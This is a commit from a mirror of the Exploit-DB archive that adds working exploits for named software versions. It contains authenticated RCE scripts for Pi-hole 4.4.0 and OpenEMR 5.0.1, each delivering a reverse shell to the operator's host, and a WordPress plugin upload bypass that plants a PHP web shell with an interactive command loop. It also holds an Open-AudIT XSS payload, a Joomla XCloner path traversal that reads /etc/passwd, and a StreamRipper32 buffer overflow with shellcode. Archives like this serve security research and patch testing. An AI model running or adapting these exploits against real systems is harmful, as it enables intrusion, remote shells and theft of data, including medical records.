bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-05-27

Browse source 
7 changes to exploits/shellcodes

StreamRipper32 2.6 - Buffer Overflow (PoC)
OpenEMR 5.0.1 - Remote Code Execution
Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)
Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)
Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-05-27 05:02:09 +00:00
parent ddf3311cf6
commit e031da05b0
8 changed files with 725 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

254
exploits/linux/webapps/48519.py Executable file
View file

@ -0,0 +1,254 @@
# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
# Date: 2020-05-22
# Exploit Author: Photubias
# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE
# Version: Pi-hole <=4.4.0 + Web <=4.3.3
# Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10)
# CVE: CVE-2020-11108
#!/usr/bin/env python3
'''
Copyright 2020 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py
File name CVE-2020-11108.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
## Vulnerable setup instructions (from clean Debian 10-Buster):
> apt update && apt install -y curl
> curl -sSL https://install.pi-hole.net | bash
> pihole checkout web release/v4.3.3
> cd /etc/.pihole/ && git checkout v4.4
> pihole -r ## Select reconfigure
This is a native implementation without requirements, written in Python 3.
Works equally well on Windows as Linux (as MacOS, probably ;-)
Features:
* Does a reliable check before exploitation (not based on version numbers)
* Performs normal RCE without Privilege Escalation (wich is more trust worthy)
* Asks before running Root RCE (as this overwrites certain files)
* Performs a cleanup in all cases (success / failure)
'''
import urllib.request, ssl, http.cookiejar, sys, string, random
import socket, _thread, time
## Default vars; change at will
_sURL = '192.168.50.130'
_sPASSWORD = '6DS4QtW5'
_iTIMEOUT = 5
_sLOCALIP = '192.168.50.1'
_sFILENAME = 'fun2.php'
_sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first
## Ignore unsigned certs
ssl._create_default_https_context = ssl._create_unverified_context
## Keep track of cookies between requests
cj = http.cookiejar.CookieJar()
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
def randomString(iStringLength=8):
sLetters = string.ascii_lowercase
return ''.join(random.choice(sLetters) for i in range(iStringLength))
def postData(sURL, lData, bEncode = True):
try:
if bEncode: oData = urllib.parse.urlencode(lData).encode()
else: oData = str(lData).encode()
oRequest = urllib.request.Request(url = sURL, data = oData)
return oOpener.open(oRequest, timeout = _iTIMEOUT)
except:
print('----- ERROR, site down?')
sys.exit(1)
def getEndpoint():
if not _sURL[:4].lower() == 'http': sURL = 'http://' + _sURL
else: sURL = _sURL
if not sURL[:-1] == '/': sURL += '/'
if not '/admin' in sURL: sURL += 'admin'
try:
oRequest = urllib.request.Request(sURL)
oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT)
except:
print('[-] Error: ' + sURL + ' not responding')
exit(1)
if oResponse.code == 200:
print('[+] Vulnerable URL is ' + sURL)
return sURL
else:
print('[-] Error: ' + sURL + ' does not exist?')
exit(1)
def startListener(sPayload, iSockTimeout):
## Listener must always be on port 80, does not work otherwise
oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('[!] Binding to '+_sLOCALIP+':80')
oSock.bind((_sLOCALIP,80))
oSock.settimeout(iSockTimeout)
oSock.listen()
while True:
try: oConn,sAddr= oSock.accept()
except: break
print('[+] Yes, we have an incoming connection from '+str(sAddr[0]))
oConn.sendall(sPayload.encode())
oConn.close()
break
oSock.close()
print('[!] Closing Listener')
def doLogin(sURL, sPassword):
sPath = '/index.php?login'
lData = {'pw':sPassword}
oResponse = postData(sURL + sPath, lData)
sResult = oResponse.read().decode(errors='ignore')
if 'Wrong password' in sResult:
print('Wrong password')
sys.exit(1)
return True
def getToken(sURL):
sPath = '/settings.php?tab=blocklists'
oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
sResult = oResponse.read().decode(errors='ignore')
if 'id=\'token\'' in sResult:
return sResult.split('id=\'token\' hidden>')[1].split('<')[0]
else:
print('[-] Error in getting a token')
sys.exit(1)
def createBackdoor(sURL, sFilename):
sToken = getToken(sURL)
sPath = '/settings.php?tab=blocklists'
lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "', 'field':'adlists', 'token':sToken, 'submit':'save'}
#lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o fun.php -d "', 'field':'adlists', 'token':sToken, 'submit':'saveupdate'}
oResponse = postData(sURL + sPath, lData)
if oResponse.code == 200:
sResult = oResponse.read().decode(errors='ignore')
arrBlocklists = sResult.split('target="_new"')
sID = str(len(arrBlocklists)-2)
print('[+] Creation success, ID is '+sID+'!')
return sID
else:
return ''
def doUpdate(sURL):
sPath = '/scripts/pi-hole/php/gravity.sh.php'
try:
oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
if oResponse.code == 200: print('[+] Update succeeded.')
return True
except:
print('[-] Error; callback failed, maybe a firewall issue?')
return False
def callExploit(sURL, sFilename = _sFILENAME):
sPath = '/scripts/pi-hole/php/' + sFilename
print('[+] Calling ' + sURL + sPath)
try:
oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
if oResponse.code == 200: print('[+] Calling exploit succeeded.')
print(oResponse.read().decode(errors='ignore'))
except:
pass
def removeEntry(sURL, sID):
print('[+] Cleaning up now.')
sToken = getToken(sURL)
sPath = '/settings.php?tab=blocklists'
lData = {'adlist-del-'+sID:'on', 'newuserlists':'', 'field':'adlists', 'token':sToken, 'submit':'save'}
oResponse = postData(sURL + sPath, lData)
if oResponse.code == 200:
print('[+] Remove success')
def main():
global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT
if len(sys.argv) == 1:
print('[!] No arguments found: python3 CVE-2020-11108.py <dstIP> <srcIP> <PWD>')
print(' Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5')
print(' But for now, I will ask questions')
sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ')
if not sAnswer == '': _sURL = sAnswer
sAnswer = input('[?] Please enter the your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ')
if not sAnswer == '': _sLOCALIP = sAnswer
sAnswer = input('[?] Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ')
if not sAnswer == '': _sPASSWORD = sAnswer
else:
_sURL = sys.argv[1]
_sLOCALIP = sys.argv[2]
_sPASSWORD = sys.argv[3]
## MAIN
sURL = getEndpoint() ## Will also set the initial SessionID
doLogin(sURL, _sPASSWORD)
## Creating backdoor (1) ## the old 'fun.php'
sFilename = randomString() + '.php'
sID = createBackdoor(sURL, sFilename)
## Launch first payload listener and send 200 OK
_thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,))
if doUpdate(sURL):
print('[+] This system is vulnerable!')
## Question Time
sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ')
if not sAnswer.lower() == 'y':
removeEntry(sURL, sID)
sys.exit(0)
sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ')
if sAnswer.lower() == 'y': bRoot = True
else: bRoot = False
if bRoot:
print('[!] Allright, going for the root shell')
## Launch payload listener and send root shell
_sPayload = '''<?php shell_exec("sudo pihole -a -t") ?>'''
_thread.start_new_thread(startListener,(_sPayload,5,))
doUpdate(sURL)
## Creating backdoor (2), overwriting teleporter.php
sID2 = createBackdoor(sURL, 'teleporter.php')
## Launch payload listener for a new 200 OK
_thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,))
doUpdate(sURL)
input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...')
## Launch shell payload listener:
_sPayload = '''<?php
shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'")
?>
''' %(_sLOCALIP, _sLOCALNCPORT)
#_sPayload = '''<?php system($_GET['cmd']); ?>''' ## this works perfectly, but the URL is authenticated
_thread.start_new_thread(startListener,(_sPayload,5,))
doUpdate(sURL)
## Launching the payload, will create new PHP file
callExploit(sURL, sFilename)
## Remove entry again
if bRoot: removeEntry(sURL, sID2)
removeEntry(sURL, sID)
if len(sys.argv) == 1: input('[+] All done, press enter to exit')
if __name__ == "__main__":
main()

187
exploits/php/webapps/48515.py Executable file
View file

@ -0,0 +1,187 @@
# Title: OpenEMR 5.0.1 - Remote Code Execution
# Exploit Author: Musyoka Ian
# Date: 2020-05-25
# Title: OpenEMR < 5.0.1 - Remote Code Execution
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69
# openemr_exploit.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import requests
import time
auth = "[+] Authentication with credentials provided please be patient"
upload = "[+] Uploading a payload it will take a minute"
netcat = "[+] You should be getting a shell"
s = requests.Session()
payload = {'site': 'default', 'mode' : 'save', 'docid' : 'shell.php', 'content' : """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; # CHANGE THIS
$port = 9001; # CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?> """}
print (auth)
url = "http://localhost/openemr/interface/main/main_screen.php?auth=login&site=default"
data= {
'new_login_session_management' : '1',
'authProvider' : 'Default',
'authUser' : 'admin', # change this to the the appropriate username
'clearPass' : 'password123', # change this to the appropriate password
'languageChoice' : '1',
}
response = s.post(url, data=data,).text
time.sleep(2)
print (upload)
time.sleep(2)
resp = s.post("http://localhost/openemr/portal/import_template.php?site=default", data = payload)
time.sleep(2)
print (netcat)
rev_shell = s.get("http://localhost/openemr/portal/shell.php")
print (rev_shell.text)

12
exploits/php/webapps/48516.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)
# Date: 2020-04-26
# Exploit Author: Kamaljeet Kumar
# Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/
# Software Link: https://www.open-audit.org/downloads.php
# Version: 3.3.0
# CVE : CVE-2020-12261
# POC:
Step 1: Login to Open-Audit
Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and add this "<svg><animate onend=alert(1) attributeName=x dur=1s>" payload after the search, the URL look like: http://192.168.0.4/open-audit/index.php/search/<svg><animate onend=alert(1) attributeName=x dur=1s>
Then we get the XSS pop up.

103
exploits/php/webapps/48518.txt Normal file
View file

@ -0,0 +1,103 @@
# Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)
# Date: 2020-05-10
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Exploit-Db Author ID: 8763
# Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/
# Vendor Homepage: http://www.xcloner.com
# Software Link: https://www.xcloner.com/support/download/
# Version: 3.5.3
# Tested on: Kali Linux - Apache2
--------------------------------------------------------------------------------
Detail:
--------------------------------------------------------------------------------
File: administrator/components/com_xcloner-backupandstore/admin.cloner.php -->
------------
case 'download':
downloadBackup($_REQUEST['file']);
break;
-------------
downloadBackup function's file -> administrator/components/com_xcloner-backupandstore/cloner.functions.php
Vulnerable parameter: file
downloadBackup function's definition
--------------------------------------------------------------------------------
function downloadBackup($file)
{
global $_CONFIG;
$file = realpath($_CONFIG['clonerPath'] . "/$file");
//First, see if the file exists
if (!is_file($file)) {
die("<b>404 File $file was not found!</b>");
}
//File Info
$len = get_filesize($file);
$filename = basename($file);
$file_extension = strtolower(substr(strrchr($filename, "."), 1));
//Setam Content-Type-urile pentru fisierul in cauza
switch ($file_extension) {
default:
$ctype = "application/force-download";
}
smartReadFile($file, $filename);
exit;
}
--------------------------------------------------------------------------------
and smartReadFile function's definition
--------------------------------------------------------------------------------
function smartReadFile($location, $filename, $mimeType='application/octet-stream')
{ if(!file_exists($location))
{ header ("HTTP/1.0 404 Not Found");
return;
}
$size=filesize($location);
$time=date('r',filemtime($location));
$fm=@fopen($location,'r');
.
.
.
--------------------------------------------------------------------------------
PoC:
Request:
--------------------------------------------------------------------------------
GET /joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=download&file=../../../../../../../../etc/passwd HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=view
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1
--------------------------------------------------------------------------------
Response:
--------------------------------------------------------------------------------
HTTP/1.0 200 OK
Date: Sun, 10 May 2020 18:12:04 GMT
Server: Apache/2.4.41 (Debian)
Cache-Control: public, must-revalidate, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 3347
Content-Range: bytes 0-3347/3347
Content-Disposition: inline; filename=passwd
Content-Transfer-Encoding: binary
Last-Modified: Sun, 22 Mar 2020 05:41:35 -0700
Connection: close
Content-Type: application/octet-stream
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
.
.

123
exploits/php/webapps/48520.txt Normal file
View file

@ -0,0 +1,123 @@
# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: Austin Martin
# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/
# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Vendor Homepage: https://www.codedropz.com/
# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Version: 1.3.3.2
# Tested on: WordPress 5.4.1, PHP 7.41
# CVE : N/A
# Notes:
# At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications
# Application was patched by vendor within 24 hours of initial disclosure
# This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed
# Any file types can be added to the "supported_type" parameter
# These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/
# Dangerous file types such as php have "_.txt" appended to the end creating a text file
# This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name
# ex. "php%" for file type and "shell.php%" for filename
# The PHP payload in the POC can be easily modified to gain a reverse shell
#!/usr/bin/python
import string
import random
import requests
from bs4 import BeautifulSoup
import sys
payloadurl=""
def RecurseLinks(base,file):
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"}
f = requests.get(base, headers=headers)
soup = BeautifulSoup(f.content, "html.parser")
for root in soup.find_all("a"):
href = root.get("href")
if (href.startswith("/")):
do = "nothing"
elif (href.endswith("/")):
RecurseLinks(base + href, file)
else:
if file in href:
print ("\n[+] File Found --> " + base + href)
global payloadurl
payloadurl = (base+href)
def main():
#os.system('cls')
print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution")
print("@amartinsec --> Twitter\nCVE:2020-12800\n")
#Build The Request
#Generate random URL for filename
file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6))
urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ")
#Finding the nonce used in the Ajax security string
print ("\n[+] Searching for security string nonce")
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
homepage = requests.get(urlinput,headers=headers)
homepage = homepage.text
homepage = homepage.split("ajax_nonce\":\"",1)[1]
securitykey = homepage[:10]
print("[+] Found security string --> " + securitykey)
url = urlinput + "/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601",
}
data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \
"php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \
"5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \
"dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \
"\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \
"\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \
"filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \
"<?php echo shell_exec($_GET['e'].' 2>&1'); ?>" \
"\r\n-----------------------------350278735926454076983690555601--\r\n"
print "\n[+] Sending payload to target"
response = requests.post(url, headers=headers, data=data)
if "200" in str(response):
print("[+] Looks like a successful file upload!\n")
elif "403" in str(response):
print("\nFile Upload Failed")
print("403 in response. Check security string")
sys.exit(1)
else:
print("File upload failed. Try the manual way with Burp")
sys.exit(1)
print("[+] Crawling for the uploaded file. This may take a minute...")
print("[+] Searching for " + file + ".php")
RecurseLinks(urlinput + "/wp-content/uploads/",file)
if payloadurl == "":
print("Can't find the file on the web server")
print("Try the manual method")
sys.exit(1)
#If all goes well, we can now send requests for RCE
print("[+] Success\n")
while True:
cmd= raw_input("[+] CMD: ")
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
request = requests.get(payloadurl + "?e=" + cmd, headers=headers)
print request.text
if __name__ == "__main__":
main()

39
exploits/windows/local/48517.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Tested On: Win10 x64
# Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
# Vendor Page: http://streamripper.sourceforge.net/
# Version: 2.6
# Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern"
#Bad Characters \x00\x0A\x0D
file = open('exploit.txt', 'wb')
buf = b""
buf += b"A" * 256
buf += b"\x47\x23\x30\x74" #74302347
buf += b"\x90" * 30
#calc payload
buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5"
buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d"
buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73"
buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79"
buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8"
buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c"
buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1"
buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60"
buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6"
buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91"
buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf"
buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33"
buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c"
buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64"
buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1"
buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44"
buf += b"\x90" * (1000 - len(buf))
file.write(buf)
file.close()

6
files_exploits.csv
View file

@ -11082,6 +11082,7 @@ id,file,description,date,author,type,platform,port
48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows, 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows, 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42742,3 +42743,8 @@ id,file,description,date,author,type,platform,port
48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, 48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php, 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php, 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,
48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php,
48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php,
48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,
48519,exploits/linux/webapps/48519.py,"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)",2020-05-26,Photubias,webapps,linux,
48520,exploits/php/webapps/48520.txt,"WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution",2020-05-26,"Austin Martin",webapps,php,

Can't render this file because it is too large.